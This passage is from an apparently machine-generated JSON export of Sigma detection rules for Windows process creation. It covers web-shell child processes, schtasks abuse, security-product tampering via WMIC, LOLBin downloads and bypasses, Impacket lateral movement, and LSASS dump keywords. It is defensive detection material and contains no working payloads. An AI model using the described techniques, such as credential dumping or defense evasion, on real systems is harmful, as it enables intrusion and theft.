Stanford @svch0st, Tim Shelton, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2019-01-16", "falsepositive": [ "Particular web applications may spawn a shell process legitimately" ], "filename": "proc_creation_win_webshell_susp_process_spawned_from_webserver.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_webshell_susp_process_spawned_from_webserver.yml" ], "tags": [ "attack.persistence", "attack.t1505.003", "attack.t1190" ] }, "related": [ { "dest-uuid": "5d0d3609-d06d-49e1-b9c9-b544e0c618cb", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "8202070f-edeb-4d31-a010-a26c72ac5600", "value": "Suspicious Process By Web Server Process" }, { "description": "Detects scheduled task creations or modification on a suspicious schedule type", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-09-09", "falsepositive": [ "Legitimate processes that run at logon. 
Filter according to your environment" ], "filename": "proc_creation_win_schtasks_schedule_type.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-change", "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-create", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_schedule_type.yml" ], "tags": [ "attack.execution", "attack.t1053.005" ] }, "related": [ { "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "24c8392b-aa3c-46b7-a545-43f71657fe98", "value": "Suspicious Schtasks Schedule Types" }, { "description": "Detects the usage of schtasks with the delete flag and the asterisk symbol to delete all tasks from the schedule of the local computer, including tasks scheduled by other users.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-09-09", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_schtasks_delete_all.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-delete", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_delete_all.yml" ], "tags": [ "attack.impact", "attack.t1489" ] }, "related": [ { "dest-uuid": "20fb2507-d71c-455d-9b6d-6104461cf26b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "220457c1-1c9f-4c2e-afe6-9598926222c1", "value": "Delete All Scheduled Tasks" }, { "description": "Detects the execution of 
\"BitLockerToGo.EXE\".\nBitLocker To Go is BitLocker Drive Encryption on removable data drives. This feature includes the encryption of, USB flash drives, SD cards, External hard disk drives, Other drives that are formatted by using the NTFS, FAT16, FAT32, or exFAT file system.\nThis is a rarely used application and usage of it at all is worth investigating.\nMalware such as Lumma stealer has been seen using this process as a target for process hollowing.\n", "meta": { "author": "Josh Nickels, mttaggart", "creation_date": "2024-07-11", "falsepositive": [ "Legitimate usage of BitLockerToGo.exe to encrypt portable devices." ], "filename": "proc_creation_win_bitlockertogo_execution.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://bazaar.abuse.ch/sample/8c75f8e94486f5bbf461505823f5779f328c5b37f1387c18791e0c21f3fdd576/", "https://tria.ge/240521-ynezpagf56/behavioral1", "https://bazaar.abuse.ch/sample/64e6605496919cd76554915cbed88e56fdec10dec6523918a631754664b8c8d3/", "https://any.run/report/6eea2773c1b4b5c6fb7c142933e220c96f9a4ec89055bf0cf54accdcde7df535/a407f006-ee45-420d-b576-f259094df091", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitlockertogo_execution.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7f2376f9-42ee-4dfc-9360-fecff9a88fc8", "value": "BitLockerTogo.EXE Execution" }, { "description": "Detects execution of the \"VMwareToolBoxCmd.exe\" with the \"script\" and \"set\" flag to setup a specific script to run for a specific VM state", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-06-14", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_vmware_toolbox_cmd_persistence.yml", "level": "medium", 
"logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://bohops.com/2021/10/08/analyzing-and-detecting-a-vmtools-persistence-technique/", "https://www.hexacorn.com/blog/2017/01/14/beyond-good-ol-run-key-part-53/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_vmware_toolbox_cmd_persistence.yml" ], "tags": [ "attack.execution", "attack.persistence", "attack.t1059" ] }, "related": [ { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7aa4e81a-a65c-4e10-9f81-b200eb229d7d", "value": "Potential Persistence Via VMwareToolBoxCmd.EXE VM State Change Script" }, { "description": "Detects uninstallation or termination of security products using the WMIC utility", "meta": { "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2021-01-30", "falsepositive": [ "Legitimate administration" ], "filename": "proc_creation_win_wmic_uninstall_security_products.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.trendmicro.com/en_us/research/23/a/vice-society-ransomware-group-targets-manufacturing-companies.html", "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/", "https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/", "https://twitter.com/cglyer/status/1355171195654709249", "https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_uninstall_security_products.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": 
"related-to" } ], "uuid": "847d5ff3-8a31-4737-a970-aeae8fe21765", "value": "Potential Tampering With Security Products Via WMIC" }, { "description": "Detects potentially suspicious behaviour using secedit.exe, such as exporting or modifying the security policy", "meta": { "author": "Janantha Marasinghe", "creation_date": "2022-11-18", "falsepositive": [ "Legitimate administrative use" ], "filename": "proc_creation_win_secedit_execution.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://blueteamops.medium.com/secedit-and-i-know-it-595056dee53d", "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/secedit", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_secedit_execution.yml" ], "tags": [ "attack.discovery", "attack.persistence", "attack.defense-evasion", "attack.credential-access", "attack.privilege-escalation", "attack.t1562.002", "attack.t1547.001", "attack.t1505.005", "attack.t1556.002", "attack.t1562", "attack.t1574.007", "attack.t1564.002", "attack.t1546.008", "attack.t1546.007", "attack.t1547.014", "attack.t1547.010", "attack.t1547.002", "attack.t1557", "attack.t1082" ] }, "related": [ { "dest-uuid": "4eb28bed-d11a-4641-9863-c2ac017d910a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "9efb1ea7-c37b-4595-9640-b7680cd84279", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "379809f6-2fac-42c1-bd2e-e9dee70b27f8", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "3731fbcd-0e43-47ae-ae6c-d15e510f0d42", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "3d333250-30e4-4a82-9edc-756c68afc529", "tags": [ 
"estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "0c2d00da-7742-49e7-9928-4514e5075d32", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "8c4aef43-48d5-49aa-b2af-c0cd58d30c3d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "70e52b04-2a0c-4cea-9d18-7149f1df9dc5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "f63fe421-b1d1-45c0-b8a7-02cd16ff2bed", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "22522668-ddf6-470b-a027-9d6866679f67", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "43881e51-ac74-445b-b4c6-f9f9e9bf23fe", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "b8cfed42-6a8a-4989-ad72-541af74475ec", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "035bb001-ab69-4a0b-9f6c-2de8b09e1b9d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c2c76b77-32be-4d1f-82c9-7e544bdfe0eb", "value": "Potential Suspicious Activity Using SeCEdit" }, { "description": "Detects the usage of the \"Squirrel.exe\" to download arbitrary files. 
This binary is part of multiple Electron based software installations (Slack, Teams, Discord, etc.)\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), Karneades / Markus Neis, Jonhnathan Ribeiro, oscd.community", "creation_date": "2022-06-09", "falsepositive": [ "Expected FP with some Electron based applications such as (1Clipboard, Beaker Browser, Caret, Discord, GitHub Desktop, etc.)" ], "filename": "proc_creation_win_squirrel_download.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Squirrel/", "http://www.hexacorn.com/blog/2019/03/30/sqirrel-packages-manager-as-a-lolbin-a-k-a-many-electron-apps-are-lolbins-by-default/", "http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_squirrel_download.yml" ], "tags": [ "attack.defense-evasion", "attack.execution", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1e75c1cc-c5d4-42aa-ac3d-91b0b68b3b4c", "value": "Arbitrary File Download Via Squirrel.EXE" }, { "description": "Detects execution of \"odbcconf\" with the \"INSTALLDRIVER\" action where the driver doesn't contain a \".dll\" extension. 
This is often used as a defense evasion method.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-05-23", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_odbcconf_driver_install_susp.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.hexacorn.com/blog/2020/08/23/odbcconf-lolbin-trifecta/", "https://web.archive.org/web/20191023232753/https://twitter.com/Hexacorn/status/1187143326673330176", "https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_odbcconf_driver_install_susp.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218.008" ] }, "related": [ { "dest-uuid": "6e3bd510-6b33-41a4-af80-2d80f3ee0071", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "cb0fe7c5-f3a3-484d-aa25-d350a7912729", "value": "Suspicious Driver/DLL Installation Via Odbcconf.EXE" }, { "description": "Detects usage of the \"systeminfo\" command to retrieve information", "meta": { "author": "frack113", "creation_date": "2022-01-01", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_systeminfo_execution.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1082/T1082.md#atomic-test-1---system-information-discovery", "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/systeminfo", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_systeminfo_execution.yml" ], "tags": [ "attack.discovery", "attack.t1082" ] }, "related": [ { "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } 
], "uuid": "0ef56343-059e-4cb6-adc1-4c3c967c5e46", "value": "Suspicious Execution of Systeminfo" }, { "description": "Detects potentially suspicious execution of the Regasm/Regsvcs utilities from a potentially suspicious location", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-25", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_regasm_regsvcs_uncommon_location_execution.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.fortiguard.com/threat-signal-report/4718?s=09", "https://lolbas-project.github.io/lolbas/Binaries/Regsvcs/", "https://lolbas-project.github.io/lolbas/Binaries/Regasm/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regasm_regsvcs_uncommon_location_execution.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218.009" ] }, "related": [ { "dest-uuid": "c48a67ee-b657-45c1-91bf-6cdbe27205f8", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "cc368ed0-2411-45dc-a222-510ace303cb2", "value": "Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location" }, { "description": "Executes arbitrary PowerShell code using SyncAppvPublishingServer.vbs", "meta": { "author": "frack113", "creation_date": "2021-07-16", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_lolbin_syncappvpublishingserver_vbs_execute_psh.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1216/T1216.md", "https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_syncappvpublishingserver_vbs_execute_psh.yml" ], "tags": [ "attack.defense-evasion", 
"attack.t1218", "attack.t1216" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "f6fe9070-7a65-49ea-ae72-76292f42cebe", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "36475a7d-0f6d-4dce-9b01-6aeb473bbaf1", "value": "SyncAppvPublishingServer VBS Execute Arbitrary PowerShell Code" }, { "description": "Remote.exe is part of WinDbg in the Windows SDK and can be used for AWL bypass and running remote files.", "meta": { "author": "Christopher Peacock @SecurePeacock, SCYTHE @scythe_io", "creation_date": "2022-06-02", "falsepositive": [ "Approved installs of Windows SDK with Debugging Tools for Windows (WinDbg)." ], "filename": "proc_creation_win_lolbin_remote.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Remote/", "https://blog.thecybersecuritytutor.com/Exeuction-AWL-Bypass-Remote-exe-LOLBin/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_remote.yml" ], "tags": [ "attack.defense-evasion", "attack.t1127" ] }, "related": [ { "dest-uuid": "ff25900d-76d5-449b-a351-8824e62fc81b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4eddc365-79b4-43ff-a9d7-99422dc34b93", "value": "Use of Remote.exe" }, { "description": "Detects execution of Windows Defender \"OfflineScannerShell.exe\" from its non standard directory.\nThe \"OfflineScannerShell.exe\" binary is vulnerable to DLL side loading and will load any DLL named \"mpclient.dll\" from the current working directory.\n", "meta": { "author": "frack113", "creation_date": "2022-03-06", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_offlinescannershell_mpclient_sideloading.yml", 
"level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Binaries/OfflineScannerShell/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_offlinescannershell_mpclient_sideloading.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "02b18447-ea83-4b1b-8805-714a8a34546a", "value": "Potential Mpclient.DLL Sideloading Via OfflineScannerShell.EXE Execution" }, { "description": "Detects the execution of a renamed version of the Plink binary", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-06-06", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_renamed_plink.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://the.earth.li/~sgtatham/putty/0.58/htmldoc/Chapter7.html", "https://thedfirreport.com/2022/06/06/will-the-real-msiexec-please-stand-up-exploit-leads-to-data-exfiltration/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_plink.yml" ], "tags": [ "attack.defense-evasion", "attack.t1036" ] }, "related": [ { "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1c12727d-02bf-45ff-a9f3-d49806a3cf43", "value": "Renamed Plink Execution" }, { "description": "Detects the presence of the keywords \"Wscript\", \"Shell\" and \"Run\" in the command, which could indicate a suspicious activity", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-31", "falsepositive": [ "Inline scripting can be used by some rare third party applications or 
administrators. Investigate and apply additional filters accordingly" ], "filename": "proc_creation_win_mshta_inline_vbscript.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://blog.talosintelligence.com/modernloader-delivers-multiple-stealers-cryptominers-and-rats/", "https://web.archive.org/web/20220830122045/http://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mshta_inline_vbscript.yml" ], "tags": [ "attack.execution", "attack.t1059" ] }, "related": [ { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "2c28c248-7f50-417a-9186-a85b223010ee", "value": "Wscript Shell Run In CommandLine" }, { "description": "Detects uncommon \"userinit.exe\" child processes, which could be a sign of uncommon shells or login scripts used for persistence.", "meta": { "author": "Tom Ueltschi (@c_APT_ure), Tim Shelton", "creation_date": "2019-01-12", "falsepositive": [ "Legitimate logon scripts or custom shells may trigger false positives. Apply additional filters accordingly." 
], "filename": "proc_creation_win_userinit_uncommon_child_processes.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/windows-server/administration/server-core/server-core-sconfig#powershell-is-the-default-shell-on-server-core", "https://cocomelonc.github.io/persistence/2022/12/09/malware-pers-20.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_userinit_uncommon_child_processes.yml" ], "tags": [ "attack.t1037.001", "attack.persistence" ] }, "related": [ { "dest-uuid": "eb125d40-0b2d-41ac-a71a-3229241c2cd3", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "0a98a10c-685d-4ab0-bddc-b6bdd1d48458", "value": "Uncommon Userinit Child Process" }, { "description": "Detects the execution of PingCastle, a tool designed to quickly assess the Active Directory security level via a script located in a potentially suspicious or uncommon location.\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems)", "creation_date": "2024-01-11", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_pua_pingcastle_script_parent.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/802-1x/Compliance/blob/2e53df8b6e89686a0b91116b3f42c8f717dca820/Ping%20Castle/Get-PingCastle-HTMLComplianceReport.ps1#L8", "https://github.com/projectHULK/AD_Recon/blob/dde2daba9b3393a9388cbebda87068972cc0bd3b/SecurityAssessment.ps1#L2699", "https://github.com/EvotecIT/TheDashboard/blob/481a9ce8f82f2fd55fe65220ee6486bae6df0c9d/Examples/RunReports/PingCastle.ps1", "https://github.com/lkys37en/Start-ADEnum/blob/5b42c54215fe5f57fc59abc52c20487d15764005/Functions/Start-ADEnum.ps1#L680", 
"https://github.com/fengjixuchui/Start-ADEnum/blob/e237a739db98b6104427d833004836507da36a58/Functions/Start-ADEnum.ps1#L450", "https://thedfirreport.com/2023/10/30/netsupport-intrusion-results-in-domain-compromise/", "https://github.com/vletoux/pingcastle", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_pingcastle_script_parent.yml" ], "tags": [ "attack.reconnaissance", "attack.t1595" ] }, "related": [ { "dest-uuid": "67073dde-d720-45ae-83da-b12d5e73ca3b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b37998de-a70b-4f33-b219-ec36bf433dc0", "value": "PUA - PingCastle Execution From Potentially Suspicious Parent" }, { "description": "Detects the use of DISM to enable the PowerShell Web Access feature, which could be used for remote access and potential abuse", "meta": { "author": "Michael Haag", "creation_date": "2024-09-03", "falsepositive": [ "Legitimate PowerShell Web Access installations by administrators" ], "filename": "proc_creation_win_dism_enable_powershell_web_access_feature.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-241a", "https://gist.github.com/MHaggis/7e67b659af9148fa593cf2402edebb41", "https://docs.microsoft.com/en-us/powershell/module/dism/enable-windowsoptionalfeature", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dism_enable_powershell_web_access_feature.yml" ], "tags": [ "attack.persistence", "attack.t1548.002" ] }, "related": [ { "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7e8f2d3b-9c1a-4f67-b9e8-8d9006e0e51f", "value": "PowerShell Web Access Feature Enabled Via DISM" }, { "description": "Detects a suspicious process spawning a Chromium 
based browser process with the 'load-extension' flag to start an instance with a custom extension", "meta": { "author": "Aedan Russell, frack113, X__Junior (Nextron Systems)", "creation_date": "2022-06-19", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_browsers_chromium_susp_load_extension.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://emkc.org/s/RJjuLa", "https://redcanary.com/blog/chromeloader/", "https://www.mandiant.com/resources/blog/lnk-between-browsers", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_browsers_chromium_susp_load_extension.yml" ], "tags": [ "attack.persistence", "attack.t1176" ] }, "related": [ { "dest-uuid": "389735f1-f21c-4208-b8f0-f8031e7169b8", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "27ba3207-dd30-4812-abbf-5d20c57d474e", "value": "Suspicious Chromium Browser Instance Executed With Custom Extension" }, { "description": "Detects wmiexec/dcomexec/atexec/smbexec from Impacket framework", "meta": { "author": "Ecco, oscd.community, Jonhnathan Ribeiro, Tim Rauch", "creation_date": "2019-09-03", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_hktl_impacket_lateral_movement.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/SecureAuthCorp/impacket/blob/8b1a99f7c715702eafe3f24851817bb64721b156/examples/wmiexec.py", "https://github.com/SecureAuthCorp/impacket/blob/8b1a99f7c715702eafe3f24851817bb64721b156/examples/smbexec.py", "https://github.com/SecureAuthCorp/impacket/blob/8b1a99f7c715702eafe3f24851817bb64721b156/examples/dcomexec.py", "https://www.elastic.co/guide/en/security/current/suspicious-cmd-execution-via-wmi.html", "https://github.com/SecureAuthCorp/impacket/blob/8b1a99f7c715702eafe3f24851817bb64721b156/examples/atexec.py", 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_impacket_lateral_movement.yml" ], "tags": [ "attack.execution", "attack.t1047", "attack.lateral-movement", "attack.t1021.003" ] }, "related": [ { "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "68a0c5ed-bee2-4513-830d-5b0d650139bd", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "10c14723-61c7-4c75-92ca-9af245723ad2", "value": "HackTool - Potential Impacket Lateral Movement Activity" }, { "description": "Detects execution of regsvr32 where the DLL is located in a potentially suspicious location.", "meta": { "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-05-26", "falsepositive": [ "Some installers might execute \"regsvr32\" with DLLs located in %TEMP% or in %PROGRAMDATA%. Apply additional filters if necessary." 
], "filename": "proc_creation_win_regsvr32_susp_exec_path_1.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://web.archive.org/web/20171001085340/https://subt0x10.blogspot.com/2017/04/bypass-application-whitelisting-script.html", "https://app.any.run/tasks/34221348-072d-4b70-93f3-aa71f6ebecad/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regsvr32_susp_exec_path_1.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218.010" ] }, "related": [ { "dest-uuid": "b97f1d35-4249-4486-a6b5-ee60ccf24fab", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9525dc73-0327-438c-8c04-13c0e037e9da", "value": "Regsvr32 Execution From Potential Suspicious Location" }, { "description": "Detects the presence of the keywords \"lsass\" and \".dmp\" in the commandline, which could indicate a potential attempt to dump or create a dump of the lsass process.\n", "meta": { "author": "E.M. 
Anhaus, Tony Lambert, oscd.community, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2019-10-24", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_susp_lsass_dmp_cli_keywords.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.whiteoaksecurity.com/blog/attacks-defenses-dumping-lsass-no-mimikatz/", "https://github.com/helpsystems/nanodump", "https://github.com/Hackndo/lsassy", "https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/windows/credential_access_lsass_memdump_file_created.toml", "https://github.com/CCob/MirrorDump", "https://medium.com/@markmotig/some-ways-to-dump-lsass-exe-c4a75fdc49bf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_lsass_dmp_cli_keywords.yml" ], "tags": [ "attack.credential-access", "attack.t1003.001" ] }, "related": [ { "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ffa6861c-4461-4f59-8a41-578c39f3f23e", "value": "LSASS Dump Keyword In CommandLine" }, { "description": "Attackers can use print.exe for remote file copy", "meta": { "author": "Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative", "creation_date": "2020-10-05", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_print_remote_file_copy.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/Oddvarmoe/status/985518877076541440", "https://lolbas-project.github.io/lolbas/Binaries/Print/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_print_remote_file_copy.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ 
